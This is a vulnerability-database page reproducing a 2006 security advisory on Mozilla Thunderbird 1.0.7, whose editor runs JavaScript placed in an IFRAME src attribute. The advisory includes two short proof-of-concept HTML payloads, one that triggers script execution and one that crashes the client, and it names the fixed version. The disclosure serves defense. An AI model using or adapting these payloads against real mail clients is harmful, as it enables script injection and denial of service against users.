Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

mozThunDoS.txt

🗓️ 26 Feb 2006 00:00:00Reported by nono2357Type 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 21 Views

Mozilla Thunderbird Remote Code Execution & Denial of Servic

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Mozilla Thunderbird : Remote Code Execution & Denial of Service  
  
//----- Advisory  
  
  
Program : Mozilla Thunderbird  
Homepage : http://www.mozilla.com/thunderbird/  
Tested version : <= 1.0.7  
Found by : nono2357 at sysdream dot com  
This advisory : nono2357 at sysdream dot com  
Discovery date : 2006/01/28  
  
  
//----- Application description  
  
  
Full-Featured Email  
  
Simple to use, powerful, and customizable, Thunderbird is a full-featured  
email application. Thunderbird supports IMAP and POP mail protocols, as well  
as HTML mail formatting. Easily import your existing email accounts and  
messages. Built-in RSS capabilities, powerful quick search, spell check  
as you  
type, global inbox, deleting attachments and advanced message filtering  
round  
out Thunderbird's modern feature set.  
  
  
//----- Description of vulnerability  
  
  
Thunderbird's WYSIWYG rendering engine insufficiently filters javascript  
scripts. It is possible to write javascript in the SRC attribute of the  
IFRAME  
tag. This leads to execution when the email is edited (for instance when  
replying to the email), even if javascript is disabled in the preferences.  
  
  
//----- Proof Of Concept  
  
  
* Javascript execution :  
  
<html>  
<body>  
<iframe src="javascript:alert('Found by www.sysdream.com !')"></iframe>  
</body>  
</html>  
  
* Denial of service (application crash) :  
  
<html>  
<body>  
<iframe src="javascript:parent.document.write('Found by www.sysdream.com  
!')"></iframe>  
</body>  
</html>  
  
  
//----- Solution  
  
  
Upgrade to version 1.5.  
  
Download page : http://www.mozilla.com/thunderbird/all.html  
Direct link :  
http://ftp.mozilla.org/pub/mozilla.org/thunderbird/releases/1.5/  
  
  
//----- Impact  
  
  
Successful exploitation may lead to information disclosure (application  
version, platform, user emails, user preferences, ...) or could crash the  
application.   
  
  
//----- Credits  
  
  
http://www.sysdream.com  
nono2357 at sysdream dot com  
  
  
//----- Greetings  
  
  
crashfr & the hackademy ...  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 Feb 2006 00:00Current
7.4High risk
Vulners AI Score7.4
mozilla thunderbirdremote code executiondenial of servicewysiwyg rendering enginejavascript vulnerabilityversion 1.0.7information disclosureapplication crashupgrade solutionsysdream.com
21
.json
Report